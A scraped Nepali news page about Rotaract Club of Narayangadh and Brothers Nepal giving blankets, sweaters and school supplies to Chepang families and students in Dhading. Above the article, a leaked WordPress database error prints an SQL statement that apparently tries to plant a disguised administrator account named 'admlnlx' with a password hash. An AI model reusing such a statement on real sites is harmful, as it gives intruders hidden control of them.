WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BXAOEKmQqZAc.er5ugnmjglQVWBxXi/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 14:42:00', '', 'admlnlx', 'admlnlx')
चितवन, पुस ३–
रोटर्याक्ट क्लव अफ नारायणगढ र ब्रदर्श नेपालले संयुक्त रुपमा धादिङको जोगिमारा–५ कोस्राङमा रहेका चेपाङ परिवार ब्ल्याङकेट, स्वीटर, टोपी र शैक्षिक सामाग्री वितरण गरेको छ ।
शनिबार एक कार्यक्रमगरि ७० घरधुरीलाई ब्ल्याङकेट र १३५ जना विद्यार्थीहरुलाई स्वीटर, टोपी र शैक्षिक सामाग्री वितरण गरिएको रोटर्याक्ट क्लव अफ नारायणगढकी अध्यक्ष इशा प्रधानले जानकारी दिनुभयो ।
विद्यार्थीहरुलाई कोस्राङ आधारभुत विद्यालयमै पुगी सो सामाग्री वितरण गरिएको थियो । ‘न्यानो सबैका लागि’ भन्ने नारासहित जाडोमा बस्नका लागि सहजहोस् भनि सो सामाग्री वितरण गरिएको ब्रदर्श नेपालका अध्यक्ष अनिलबाबु सोतीले जानकारी दिनुभयो ।

करिव एक लाख ५० हजार रुपैयाँ बराबरको उक्त सामाग्री पाएपछि विद्यार्थी र चेपाङ परिवार निकै खुशी भएका थिए ।
सो विद्यालयमा अझै पनि शिक्षकको अभाव रहेको छ । कक्षा ५ सम्म पढाई हुने सो विद्यालयमा हाल तीन जना शिक्षक/शिक्षिका मात्रै रहेको विद्यालय व्यवस्थापन समितिका अध्यक्ष ज्ञानबहादुर चेपाङले बताउनुभयो । कार्यक्रममा अभिभावक संघका अध्यक्ष रामशरण चेपाङ, विद्यालयकी शिक्षिका शर्मीला बस्नेत, रञ्जीता रेग्मीलगायतले बोल्नु भएको थियो ।